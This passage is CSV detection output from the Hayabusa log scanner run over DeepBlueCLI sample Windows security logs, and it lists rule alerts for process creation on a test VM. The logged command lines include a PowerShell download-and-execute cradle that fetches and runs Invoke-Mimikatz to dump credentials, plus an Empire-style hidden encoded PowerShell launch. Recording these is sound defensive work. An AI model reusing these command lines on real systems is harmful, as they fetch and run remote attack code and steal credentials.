IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:44:00.843 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:44:01.081 
+00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:44:02.654 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lnyiquaj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x818 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:44:02.654 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:43.530 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:43.908 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:43.919 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious 
Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:45.304 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zqai1ke3.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb8c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:45.304 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:54.936 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:54.972 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf88 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:55.305 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:57.041 
+00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lygfnats.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x21c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:57.041 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:47:08.750 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:47:33.985 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcd8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:47:34.016 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:47:34.235 +00:00,IE10Win7,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:49:42.000 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0x708 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:50:40.032 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" Command | Path: C:\Windows\System32\findstr.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:53:47.579 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:54:04.375 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0xb78 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:59:07.782 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" csc | Path: C:\Windows\System32\findstr.exe | PID: 0x9c8 | User: IEUser | LID: 
0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 23:01:26.782 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 23:01:26.782 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x5b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:03:05.634 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:03:05.916 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:03:06.197 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:03:06.884 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:03:06.931 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfcc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:03:25.697 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:04:55.947 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:04:55.947 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x764 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 
15:04:55.947 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:04:55.947 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:04:55.947 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:04:55.947 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:04:55.947 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:04:55.947 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:04:55.947 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:23:21.642 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe54 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:23:21.658 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:23:21.658 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:25:21.642 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:25:21.642 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:25:21.830 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:25:22.861 +00:00,IE10Win7,4688,low,Evas,Windows 
Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:25:22.861 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:38:00.158 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:43:45.656 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x318 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:43:48.234 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x488 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:44:06.459 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x64c | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:46:45.553 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:46:45.647 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb5c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:45.022 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x780 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:46.850 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Users\IEUser\Desktop\launcher.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0x9c0 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:46.881 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc 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 | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe0 | User: IEUser | LID: 
0x4d011,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:46.881 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa48 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:46.881 +00:00,IE10Win7,4688,high,Exec,Suspicious Encoded PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_enc_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:46.881 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:46.881 +00:00,IE10Win7,4688,medium,Exec,Suspicious Execution of Powershell with Base64,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_encode.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:46.881 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:46.881 +00:00,IE10Win7,4688,critical,Exec,Empire PowerShell Launch Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_empire_launch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:46.881 +00:00,IE10Win7,4688,medium,,Base64 Encoded Command Line Param 
Indicator,,rules/sigma/process_creation_builtin/proc_creation_win_susp_base64_cmdline_param.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 21:06:23.556 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 21:11:59.064 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\gpedit.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf20 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 22:00:00.562 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 22:17:58.251 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 22:17:58.259 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:34:49.989 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:34:50.038 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x700 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:34:50.394 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb98 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:34:50.577 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:34:51.064 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xed8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:34:51.099 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 
